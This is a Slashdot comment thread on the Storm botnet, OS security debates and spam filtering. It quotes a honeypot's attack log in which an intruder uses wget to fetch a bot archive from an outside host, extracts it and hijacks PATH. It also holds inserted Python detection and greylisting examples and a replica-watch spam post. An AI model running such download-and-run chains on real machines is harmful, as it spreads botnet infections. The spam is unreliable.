I hate these comments "Damn Microsoft and their inferior security". That's BS, the reason Windows gets hacked is because there are so many more MS machines than any other type of machine. Botnets are there to make money, the more machines they infect the more spam they produce, the more money they make. If you want to infect machines, you go for Windows because it has by far the most market share, so it returns the biggest profit. So all the people hacking machines aim at Windows, and multi-million dollar businesses solely aimed at hacking Windows, if any other operating system had that much focus given to it, it would collapse in days, so stop with all the shit about MS having bad security, they do quite a good job in the absolute worst circumstances and as a result only the stupid users get infections.

~Not AC cause I don't value my karma~

Re:Arggg! (0)

Anonymous Coward | more than 7 years ago | (#20363339)

Bullshit. Apache is by far the largest http server in use. You don't hear that being taken over every week. Wanker!

I don't think he gets it... (0)

Anonymous Coward | more than 7 years ago | (#20363461)

"Bullshit. Apache is by far the largest http server in use. You don't here that being taken over every week. Wanker!" - by Anonymous Coward on Sunday August 26, @01:34PM (#20363339)
You don't get it, do you? In an attack like this, they're NOT after the server systems!

The botnet herders are after client's nodes that use servers, more than anything... why?

Well, to get their bank account numbers, OR other financial data, or to fool you into buying some malware, for example.

If you were to design such a system, wouldn't YOU also go after the most used platform there is, in order to increase your surface attack vector for it? Of course you would.

And, what's the most used OS platform there is out there? Windows... & thus it gets attacked the most & especially in attacks of THIS nature.

APK

P.S.=> I know 1 thing, for sure, from actual tests & challenges I issued here @ this site - Windows can be made SO SECURE, via custom-hardening it by hand, that the /. crowd here outright RAN & evaded taking a multiplatform test of security called CIS TOOL here, 30x ++ by now:

E.G.-> HARDENING LINUX THREAD @ SLASHDOT WHERE I ISSUED CHALLENGES & A LIST OF THEM TO *NIX FOLKS:

http://it.slashdot.org/comments.pl?sid=267599&cid=20203061 [slashdot.org]

Vs. the 84.735/100 score (now up to 85.185/100 here currently in fact) I can obtain on it & CIS TOOL is noted by SANS & COMPUTERWORLD (often cited here on this site no less) as a tool that helps you secure yourself... so, so much for this statement which I see here in essence as this, quite often:

"(Insert *NIX variant here) is more secure or securable than Windows"

Well, ok - but, when faced with the challenge of "putting their money where their mouth is"? Each *NIX user, ran (& I specifically wanted SeLinux kernel hook addon users of UBUNTU/KUBUNTU + FreeBSD users to try it especially)... apk

Re:I don't think he gets it... (0)

Anonymous Coward | more than 7 years ago | (#20363623)

no, i'm pretty sure it's YOU that doesn't get it. YOU, not him. YOU








YOU!!

Weak, as I expected vs. my challenge... apk (0)

Anonymous Coward | more than 7 years ago | (#20363887)

LOL... is that the best you have as a comeback? Weak, (as per usual) from /. posters, especially regarding this type of topic, backing up their statements that "Windows is less secure or securable than *NIX & its variants")...

Lots of talk, yet no action! I say this based on a history of evidences I noted in my last post, point-blank. Argue with the numbers.

No photo proof of a score from a *NIX rig, vs. what I produce as a challenge to those that say "Windows is less secure than (insert *NIX variant here)" as to a result on a valid multiplatform security benchmark...

Put your monies where you mouths are boys!

Just beat the 85.185/100 score I can obtain using Windows Server 2003 SP #2 fully patched & custom security hardened, with the *NIX of YOUR choice... & put up photo proof (unedited, because one fool said he could do that, how WEAK!)...

Simple.

APK

P.S.=> BOTTOM-LINE: Talk's cheap boys... especially "F.U.D."-based b.s. like:

"(Insert *NIX variant here) is more secure or securable than Windows!"

That I see here @ /., worse than any other website online in fact. I don't mind it if it has some basis in verifiable facts with examples, but I do when that statement or one like it, has none of the aforementioned requirements.

So - "Put up, or shut up"... prove it. Put your monies where your mouths are... & with YOUR OWN SYSTEM, not someone else's tests or info. (the BEST test, not only of your big talk, but of YOUR SKILLS IN PERSONALLY KNOWING HOW TO HARDEN YOUR *NIX RIGS, vs. mine on Windows Server 2003).

Download, & install CIS TOOL (@ the center for internet security's website, link is in the URL below):

CIS TOOL DOWNLOAD PAGE @ THE CENTER FOR INTERNET SECURITY:

http://www.cisecurity.org/index.html [cisecurity.org]

(... run it, & beat that score I get on a Windows NT-based OS of 85.185/100 currently, & on a legitimate multiplatform test of security (noted by COMPUTERWORLD & SANS, 2 sites often cited here @ /., no less, in security-oriented threads no less) called CIS TOOL))... apk

Re:Weak, as I expected vs. my challenge... apk (1)

jguthrie (57467) | more than 7 years ago | (#20364341)

The Debian Linux "test" is a PDF file describing how to secure my system, I downloaded it, but couldn't figure out how to compute my score.

Re:Arggg! (4, Insightful)

DaleGlass (1068434) | more than 7 years ago | (#20363367)

Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that occasionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.

Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)

Re:Arggg! (1)

grommit (97148) | more than 7 years ago | (#20363565)

Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that occasionally comes online, or a big Linux/Solaris/whatever server on a DS3?

I'd pick Option C: Millions of Windows 2000/XP boxes connected to cable/dsl.

Re:Arggg! (1)

DaleGlass (1068434) | more than 7 years ago | (#20363683)

I'd pick Option C: Millions of Windows 2000/XP boxes connected to cable/dsl.

A good deal of which have ISPs that block outgoing connections on port 25, which isn't a problem for servers.

Re:Arggg! (1)

Professr3 (670356) | more than 7 years ago | (#20364017)

Let's see... host on grandma's (non-geek) box, or a Linux/Solaris/whatever server on a DS3 (with sysadmins who will hunt you down across half the 'net). I am beginning to understand why they chose the way they did.

Re:Arggg! (1)

Sancho (17056) | more than 7 years ago | (#20364035)

Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that occasionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.
Servers are going to be more highly scrutinized. Where I work, we have multiple IDS watching the network, and bandwidth monitors that watch for spikes. If a host started using up any significant amount of our bandwidth, we'd know, and we'd shut it down. Not so for most home computers. Bot infections can last for years on home computers when the user doesn't know that there's something wrong, or that they need to fix something.

Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)
Linux is a kernel. A distribution of Linux could easily have open ports, and could have vulnerabilities in those services.

Re:Arggg! (1)

rattis (125942) | more than 7 years ago | (#20364715)

Actually some Linux distros do have open ports. One of the first things I do when I install a distro at work is run nmap to get a list, and then start closing the ports I don't want open. Usually those are Redhat / RPM based distros.

I do the same thing at home. Where I run Debian / Dpkg distros.

Re:Arggg! (1)

Crazy Taco (1083423) | more than 7 years ago | (#20364737)

Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that occasionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.

If I was a spammer, I would CLEARLY rather have grandma's Win98 box host my spambot. And I'm not being sarcastic, either. Just think about this for a second. You talk about a big Linux server on DS3 being better for a botnet. Big servers typically have big IT support staffs running them. How long do you think it is going to take network personnel to notice a server spitting out a lot of spam or infecting emails? I'm not going to take a guess as to how long it would take to fix the problem, but I would bet money that at most organizations infections like that are detected within the day, if not within an hour or two.

So great, you've just compromised your big Linux server, and within a day it gets cleaned up. So you have to find a totally new exploit and try to do it again. And maybe you exploit it again, and then it gets cleaned up again. Contrast that with grandma's Win98 box... she will NEVER know she is sending out spam, and will consequently take NO ACTION to clean it up. If you are going to the trouble of assembling a huge botnet for profits, you want a botnet that is going to have operational capacity for a good length of time, as that is your source of income. You have much better odds of keeping control of a user's desktop PC than you do of flying under the IT staff's radar. The minute you try to use their machine as a spambot, they will pull the network connection. You can use grandma's PC again, and again, and again.

Oh, one last point... your comparison of grandma's win98 box to a server is very naive. Yes, one on one, the server completely outperforms the grandma box, but when you have multiple millions of grandma boxes, and the potential to infect tens or hundreds of millions more, the power CLEARLY lies with the desktop machines. Reason 1: We've seen many times that grids of desktops, through their sheer number, can outperform the fastest supercomputers. Reason 2: Ignoring the fact that servers have IT staff, you still have to contend with the fact that the server market uses fewer machines by far, and that those machines are fragmented by OS. Your exploit that targets Linux can only potentially capture a fraction of the server market, as many others run Solaris, HP UX, Windows Server, etc. With desktops, the market is FAR larger, and consolidated with a single OS. Clearly you want to target the largest market, and the fact that that market also has the least policing by IT professionals makes it an even bigger sweet spot. If I'm a spammer, I'm TOTALLY going for the desktops when making a botnet. QED.

Re:Arggg! (1, Insightful)

Anonymous Coward | more than 7 years ago | (#20363625)

It is a rather odd activity, discounting one excuse for another, when in fact both are part of the bigger picture. You can argue that the popularity of the Windows OS makes it a target for these sorts of attacks, and it is quite likely true that this family does make a larger target to attack than the other consumer-grade operating systems. But this obviously ignores the fact that bigger targets don't always equal less secure. There is no reason that should the situation be reversed and another OS be dominant, that this particular issue would be as bad.

For example, let us assume that Windows and Operating system Y have equal market share at 45% each. OSY comes with most services disabled, Windows comes with most services enabled, which consequently increases the number of attack vectors. Which OS would you target?

So while you raise an important point about popularity, security practices at the designer, OS, and client levels are also at fault.

Windows is inherently less secure (4, Informative)

argent (18001) | more than 7 years ago | (#20363691)

the reason Windows gets hacked is because there are so many more MS machines than any other type of machine.

If that was the case, then why are Microsoft applications (like IIS) more often compromised than non-Microsoft applications even in areas where Microsoft is NOT dominant?

Windows is inherently less secure than most of the competition in a number of ways.

1. The Microsoft HTML control's use of ActiveX is inherently insecure and can not be fixed without breaking every application that uses the HTML control.
1a. This insecure design was deliberate and Microsoft fought the Justice Department to a standstill rather than change or replace it.
2. Windows requires a number of insecure services to run to perform routine operations.
2a. There is no way to force these services to be run local-only without using a firewall.
2b. This means that Windows Firewall has to be used to secure Windows to the same degree as a UNIX based system WITHOUT a firewall.
3. Windows document formats are still based on serialized COM objects. It's even possible for them to include serialized COM objects in XML files.
3a. Serialized COM objects can refer to or even contain insecure code that can be used for an attack.

The idea that any one of these three issues and their consequent corollaries are accepted boggles my mind. The idea that they're defended by the claim that the only reason Windows is more often compromised is that it is more common...I can not conceive of the confusion in the mind that would lead to such a conclusion.

Re:Windows is inherently less secure (3, Informative)

Anonymous Coward | more than 7 years ago | (#20364107)

IIS 6 has never had a remote root, and it's four years old.

Re:Windows is inherently less secure (2, Insightful)

argent (18001) | more than 7 years ago | (#20364235)

1. The point is that popularity is not the only or even the primary reason why a product can be attacked.
1a. Back in the old "classic" Mac era the Mac went through a period where it was the prime target for attacks, despite it having a fraction of the market, simply because it had such a huge surface area to attack.
1b. Apple responded to many exploits (for example, in autorun CDs and floppies) by removing dangerous capabilities.
1c. Similarly, UNIX systems usually don't come with the "r" suite enabled or often even installed any more.
2. The problems I listed have not been fixed or even addressed by Microsoft.
2a. Windows is still vulnerable to autorun attacks in CDs and USB keys.
2b. Windows still comes with dangerous components like SMS.
3. http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0400.html [neohapsis.com]

Re:Arggg! (0)

Anonymous Coward | more than 7 years ago | (#20364637)

JamesRose, you're a massive dickhead. Gotta 3 clueless naabs like you.

Now THESE guys... (1)

Mr. Yetti (1139445) | more than 7 years ago | (#20363397)

...are more like the "terrorists" the government keeps telling us to cower under our desks from. I don't spend every morning checking under my hood and in my trunk to see if some guy with his head in a towel (-- that was to make a point, not my opinion) has managed to sneak a bomb in there. I _do_, however, check my inboxes everyday to delete the 30-40 spam/infected emails that show up.

Exchange 2003 SP2 IMF (1)

DigiShaman (671371) | more than 7 years ago | (#20363401)

Unless you've got GFI or Symantec Mail Security, I'd suggest setting up IMF. It's a free spam filter included in Exchange 2003 SP2. Below is a link to get you started.

http://www.petri.co.il/block_spam_with_exchange2003_imf.htm [petri.co.il]

Obviously it doesn't prevent the spreading of SPAM, but it doesn't mean you have to live with the incoming onslaught.

Famous repl1ca w4tches r0lex Cartier Bvlgari (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#20363453)

Have you always wanted a R0lex, but don't want to pay high prices for a brand name w4tch? Then you need to visit Prest1ge Repl1cas, a website dedicated exclusively to high quality repl1cas, with the most extensive inventory on the web and a proven track record of satisfied customers. http://www.shegebb.com/ [shegebb.com] Prest1ge Repl1cas offers hundreds of R0lex repl1ca w4tches starting just above $100, and during this summer season, their already low prices have been slashed by 15 percent if you buy two or more w4tches! No matter which model R0lex you choose, their 15% discount applies to them all! But don't let this limited time offer go by... summer is ending
and it's time to impress your friends with a realistic, high quality R0lex
repl1ca w4tch, that will look and perform just like the real deal!
http://www.shegebb.com/ [shegebb.com]



If you want to be excluded from th1s ma1ling
http://www.shegebb.com/m0veme/ [shegebb.com]
We will process your request in 48hr's

Interesting Question (2, Interesting)

spikedvodka (188722) | more than 7 years ago | (#20363511)

This whole scenario brings up a rather interesting question: Is this a Spam problem, or a virus problem?

From my understanding there is no viral content in the message, so your virus scanner would have no reason to block the message. A Spam filtering company could well "pass the buck" and say that this is a virus problem, yes it's going to trigger on some spam rules, but "Where it's a virus problem, why create special rules for it"

I can see this type of attack becoming more popular in the future, at least until this question is solved.

If only they could use the botnet for the good... (3, Funny)

Jafafa Hots (580169) | more than 7 years ago | (#20363649)

... of all mankind. A distributed computing project for the benefit of the human race. Like, cracking blu-ray DRM or something.

It's not just windows they're exploiting... (5, Interesting)

nick13245 (681899) | more than 7 years ago | (#20363663)

For instance, here's a recent attack to my honeypot (Running Slackware Linux)

root@zomg:~# cat /home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession
root@zomg:~# cat /home/webmaster/.bash_history
ssh localhost
w
cat /etc/hosts
cat /proc/cpuinfo
passwd
cd /var/tmp
ks
l
sl
ls
ls- all
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
cd .bot/
PATH=.:$PATH
bash

These kinds of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.
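The history above is a textbook download-and-run chain: a fetch into a throwaway directory, an extract, removal of the archive, a hidden working directory, and a PATH hijack so that the bot's own binaries shadow the system ones. The following is an added example, not code from the poster or from any project, of how a defender can flag that chain when reviewing a honeypot's or a compromised account's .bash_history. The sample input is the history quoted in the post; the indicator names and thresholds are this example's own assumptions.

```python
import re
import shlex

# Sample input: the shell history quoted in the honeypot post above,
# reproduced here as constructed test data (it is the post's own text).
SAMPLE_HISTORY = """\
ssh localhost
w
cat /etc/hosts
cat /proc/cpuinfo
passwd
cd /var/tmp
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
cd .bot/
PATH=.:$PATH
bash
"""

FETCH_TOOLS = {"wget", "curl", "fetch", "ftp", "tftp", "scp"}
ARCHIVE_TOOLS = {"tar", "unzip", "gunzip", "bunzip2"}
ARCHIVE_SUFFIXES = (".tar.gz", ".tgz", ".tar", ".zip", ".gz", ".bz2")


def parse_history(text):
    """Split a .bash_history dump into (line_no, argv) pairs.

    shlex is used so that the quoted blank directory name the intruder
    created (mkdir " ") survives as a single argument.
    """
    entries = []
    for no, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        try:
            argv = shlex.split(line)
        except ValueError:  # unbalanced quotes: fall back to a plain split
            argv = line.split()
        if argv:
            entries.append((no, argv))
    return entries


def _is_path_hijack(argv):
    """True for PATH=.:... or export PATH=.:..., which makes ./bash shadow /bin/bash."""
    assignment = argv[1] if argv[0] == "export" and len(argv) > 1 else argv[0]
    return re.fullmatch(r"PATH=\.(:.*)?", assignment) is not None


def classify(argv):
    """Return the name of the indicator this command matches, or None."""
    cmd = argv[0]
    if cmd in FETCH_TOOLS and any("/" in a for a in argv[1:]):
        return "remote_fetch"
    if cmd in ARCHIVE_TOOLS:
        return "archive_extract"
    if cmd == "rm" and any(a.endswith(ARCHIVE_SUFFIXES) for a in argv[1:]):
        return "cleanup_of_payload"
    if cmd in ("cd", "mkdir") and len(argv) > 1:
        raw = argv[1]
        name = raw.rstrip("/").rsplit("/", 1)[-1]
        if raw.strip() == "" or (name.startswith(".") and name not in (".", "..")):
            return "hidden_or_blank_directory"
    if cmd == "passwd":
        return "password_change"
    if _is_path_hijack(argv):
        return "path_hijack"
    return None


def find_indicators(text):
    """Return [(line_no, indicator, command)] for every suspicious command."""
    hits = []
    for no, argv in parse_history(text):
        tag = classify(argv)
        if tag:
            hits.append((no, tag, " ".join(argv)))
    return hits


def looks_like_bot_drop(text):
    """A remote fetch followed later by an extract, a PATH hijack or a hidden
    working directory is the download-and-run chain shown in the post."""
    hits = find_indicators(text)
    fetch_lines = [no for no, tag, _ in hits if tag == "remote_fetch"]
    if not fetch_lines:
        return False
    first_fetch = min(fetch_lines)
    follow_ups = {"archive_extract", "path_hijack", "hidden_or_blank_directory"}
    return any(no > first_fetch and tag in follow_ups for no, tag, _ in hits)


if __name__ == "__main__":
    for no, tag, cmd in find_indicators(SAMPLE_HISTORY):
        print(f"line {no:2d}  {tag:26s} {cmd}")
    print("bot drop chain:", looks_like_bot_drop(SAMPLE_HISTORY))
```

Run against the quoted history it reports eight indicators and a positive chain verdict; a benign history of ls, cd .. and cat produces none. The ordering check in looks_like_bot_drop matters: an extract with no preceding fetch is just a sysadmin unpacking a backup, and the point of a triage script is to avoid paging on that.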

Re:It's not just windows they're exploiting... (2, Interesting)

MarkRose (820682) | more than 7 years ago | (#20364401)

Interestingly enough, imaginez0r.xhost.ro/botme.tar.gz is still available for download. Looks like the bot is controlled by IRC.

was wondering about that (1)

v1 (525388) | more than 7 years ago | (#20363669)

social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video.

I don't normally get much spam - maybe one every other week, but I've gotten two of those lately

OMG, what are you doing man. This video of you is all over the net. go look at it... http://www.youtube.com/watch?v=lAC5mj7oew5 [youtube.com] (link goes to http://90.31.69.105/ [90.31.69.105] )

and

LMAO, I cant believe you put this video online. Everyone can see your face there. LOL check it out yourself http://www.youtube.com/watch?v=ZKil6gyJXhQ [youtube.com] (link goes to http://79.178.78.71/ [79.178.78.71] )

Look at all the retards with their owned boxes lowering our quality of life...

Idiot-proofing the ultimate tool (5, Insightful)

quokkapox (847798) | more than 7 years ago | (#20363783)

You know, I can go and buy a microwave oven and plug it safely into a standardized outlet and not electrocute myself or blow up my house. I can even buy a propane tank and fire up my grill without risking my life too much. I can buy a modern automobile and feel confident that if I drive it into a tree at 30 MPH or roll it over, I still have a reasonable chance of surviving. Most things have built-in standardized safety features and/or safe failure modes (within reason).

These things I can buy are all tools, some with licensing or age restrictions attached, but all more-or-less idiot-proofed. The razor blades I bought recently to scrape paint off my windows even warned me that they were "razor sharp". Well duh.

But the most sophisticated, most powerful, most versatile, general purpose tool we humans have yet invented, the networked personal computer, has been sold to and is used by millions of people without any training whatsoever and without any warnings outside of what one might pick up from the "Dangers in Cyberspace" fluff segment on the local news.

People are using computers more and more to organize all of their critical financial information. A single security breach can have catastrophic, real consequences, if for example your identity is stolen and your credit is ruined after your bank accounts are drained overnight.

All you have to do is click on one really bad link. Sometimes, not even that.

This is just another example of how technology is changing human society in completely unpredictable ways. Back in the 80's, you might have worried about a virus wiping out your word processing file. Today, typing your username and password on an untrusted machine, even just once, can compromise your entire life, and ruin your future.

Re:Idiot-proofing the ultimate tool (1)

Lord Balto (973273) | more than 7 years ago | (#20364065)

This is a variation on what I call the Washing Machine Analogy. I originally invented it because I got tired of having to reboot my machine to "fix" certain problems. My response was that if I bought a washing machine that I had to unplug and then plug back in to get it to work, I'd take the damn thing back to the store and buy another brand.

Re:Idiot-proofing the ultimate tool (4, Insightful)

MrMr (219533) | more than 7 years ago | (#20364625)

On the planet where I live, people are obliged to take practical and theoretical exams, to buy insurance for damage they may cause to others, and still the streets are full of armed government officials to make sure none of the hundreds of detailed rules are broken. This is considered a sane precaution to reduce road traffic accidents.
Extrapolating that I'm guessing that in a couple of decades the "I don't know what my computer does, so it's not my problem" defense is going to be as acceptable as "of course I ran over your daughter, I cannot drive a car at all".

Re:Idiot-proofing the ultimate tool (1)

Kjella (173770) | more than 7 years ago | (#20364849)

You talk as if this is an unsolved problem. There's a range of solutions that could be used from using two-factor authentication, a non-networked computer, a "no-play" locked down computer where you don't block everything in firewall and don't install anything funny or even surf around, a webTV like device sold by online banks or any other number of variations. People don't want it, they want to do everything on their general purpose machine, which tells me it doesn't happen often enough or doesn't hurt enough.

It's as if your boss told you there's only going to be one server which will be your internal test, production and public webserver. There's really one solution - don't do it that way (or you can maybe hack up something with a VMware server but I still wouldn't touch that with a ten foot pole). Trying to make something people install various bits and pieces of code from all over the place on secure, is trying to make water not wet.

It doesn't work on us not because of sudo but because we got this alarm, not anywhere in the computer but up in our heads, that says "okaaaaaaaay running/allowing this is probably not a good idea". Most people don't have and will never have that alarm. The only thing that'll protect them is to limit their compromise. Then you have to deal with the spam bot in some other way. For one, ISPs coming down hard on boxes sending it out would be a good start...

stupid motherfuckers (0)

Anonymous Coward | more than 7 years ago | (#20363787)

I'd like to strangle every one of them- the botnet herders, the assholes buying their services, the piss-poor vendors who sell insecure systems, and the sheeple who run unpatched Windows. I'm on OS X, fully-patched, and still get this crap every day. What a waste of the world's resources.

You have an greeting card from an mate (click!) (1)

voidy (1003912) | more than 7 years ago | (#20363809)

I must say, it's good to know where all that was coming from. I rarely get spam, as I use a mailserver with greylisting, and any spam I do get is generally filtered correctly using Amavis/Spamassassin and ClamAV. This greeting card stuff though has plagued me. It's been marked as spam alright, but it looks like the botnets are starting to use proper SMTP servers to relay now, rather than just one shot attempts to directly connect to mailservers on port 25. A lot of outgoing traffic on port 25 is blocked from most ADSL networks nowadays, so it's more common to have to relay through your ISP's, or another relay server. This is going to make greylisting redundant pretty soon, as it works purely on the basis that any client connection which fails first time, will try again later as per the RFCs. If the Bots are relaying through RFC compliant servers, then there really isn't any point in the greylisting anymore. It's just a technology that provides a little temporary relief from the problem. Nice to know why the greeting card stuff started and stopped so abruptly regardless.
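To make the point about greylisting concrete, here is an added example (not the poster's setup, nor code from any greylisting package) that simulates the triplet check a greylisting milter performs and runs two constructed scenarios through it: a bot that speaks SMTP directly to the MX and never retries, and the same message handed to an ISP relay that honours the temporary failure and tries again. The delay and memory window are assumed policy values.

```python
from dataclasses import dataclass, field

# Policy values are assumptions for this example, not the poster's configuration.
GREYLIST_DELAY = 300      # seconds a new triplet must wait before it is accepted
GREYLIST_WINDOW = 86400   # seconds a deferred triplet is remembered


@dataclass
class Greylist:
    delay: int = GREYLIST_DELAY
    window: int = GREYLIST_WINDOW
    seen: dict = field(default_factory=dict)   # triplet -> first-seen time

    def check(self, client_ip, sender, rcpt, now):
        """Decide one delivery attempt: 'DEFER' (SMTP 4xx) or 'ACCEPT'.

        The triplet is (client IP, envelope sender, envelope recipient).
        The first attempt is always deferred; the same triplet seen again
        after `delay` seconds (and within `window`) is accepted.
        """
        key = (client_ip, sender.lower(), rcpt.lower())
        first = self.seen.get(key)
        if first is None or now - first > self.window:
            self.seen[key] = now
            return "DEFER"
        if now - first < self.delay:
            return "DEFER"
        return "ACCEPT"


def run(attempts, greylist=None):
    """Feed (time, client_ip, sender, rcpt) attempts through one greylist."""
    gl = greylist or Greylist()
    return [gl.check(ip, s, r, t) for (t, ip, s, r) in attempts]


def delivered(verdicts):
    return "ACCEPT" in verdicts


# Scenario 1 (constructed, RFC 5737 addresses): a bot talking straight to
# port 25 of the MX. It has no queue, so each triplet is seen only once and
# the message never lands.
DIRECT_BOT = [
    (0,   "203.0.113.10", "friend@example.org", "me@example.net"),
    (40,  "203.0.113.10", "mate@example.org",   "me@example.net"),   # new sender, new triplet
    (900, "198.51.100.7", "friend@example.org", "me@example.net"),   # same message, other bot
]

# Scenario 2 (constructed): the bot hands the same message to its ISP's
# relay, which honours the 4xx and retries ten minutes later.
RELAYED_BOT = [
    (0,   "192.0.2.25", "friend@example.org", "me@example.net"),
    (600, "192.0.2.25", "friend@example.org", "me@example.net"),
]


def direct_bot_outcome():
    return run(DIRECT_BOT)


def relayed_bot_outcome():
    return run(RELAYED_BOT)


if __name__ == "__main__":
    print("direct-to-MX bot:", direct_bot_outcome(), "delivered:", delivered(direct_bot_outcome()))
    print("via ISP relay:   ", relayed_bot_outcome(), "delivered:", delivered(relayed_bot_outcome()))
```

The direct-to-MX bot is deferred on every attempt because each attempt is a fresh triplet, which is exactly the behaviour greylisting relies on. The relayed copy is deferred once and then accepted, so once the bot is behind a queueing relay the greylist contributes nothing and the content filters (Amavis/SpamAssassin/ClamAV in the post) have to do the work.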

~boooodc/bin.php in apache log files (0)

Anonymous Coward | more than 7 years ago | (#20363815)

Has anyone been seeing GET requests for ~boooodc/bin.php in their log files? This has been happening to me for a month. Some are even trying to use my host as a proxy to get this from other IPs. A Google search has only shown 5 entries, and they look to be publicly accessible log files.

Is there a point to this torture anymore? (1)

Dachannien (617929) | more than 7 years ago | (#20364037)

After all this time and all these spams, isn't it fairly reasonable to assume that nearly everyone who is going to get their box owned by the trojan already has?

Does Storm Only Attack Windows? (4, Insightful)

Nom du Keyboard (633989) | more than 7 years ago | (#20364093)

Does Storm only attack Windows? Likely yes, I'm sure. Shouldn't Microsoft be attacking this one specifically with their malicious software scanner that's part of every Windows Update?

Easy to prevent this problem in Outlook (0)

Anonymous Coward | more than 7 years ago | (#20364701)

I have my Outlook set to show all messages in text (instead of HTML or rich text), and the 'reading pane' option is turned off so that I actually have to click on the email header to open the message. Most of the time I can recognize the spam just by the message title, and I delete it without reading or opening the email. By setting everything to text, it makes any embedded web links unclickable, but I guess I'm preaching to the choir here. You people know this stuff. It's the noobies that need the advice.

I also refuse to click on any links sent to me by friends. 'WOW COOL VIDEO MUST WATCH THIS ONE!' I get phone calls later on, asking if I thought the video clip was funny. I have to tell them I don't know, since I deleted the message. Since I make my living with this computer, I can't afford to do something stupid and mess it up by downloading someone else's junk, spam, virus or botnet.

Does it read slashdot? (1)

bobintetley (643462) | more than 7 years ago | (#20364807)

Maybe it's just coincidence, but I've been bombarded with the e-card things for a while now, and the YouTube thing for a couple of days or so. Since this story broke on Slashdot, I just checked the spam trap and I haven't had a single one for the last 12 hours or so...

Disconnect them (1)

LordSnooty (853791) | more than 7 years ago | (#20364957)

Form a team of investigative experts. Find all the machines in a botnet and ask their ISP to disconnect them. If an ISP refuses to cooperate, get their upstream provider involved and start threatening disconnection for all users. They'll soon fall into line.

Post reasons why this is a bad idea here. I'm beginning to have difficulty understanding why so little action is being taken.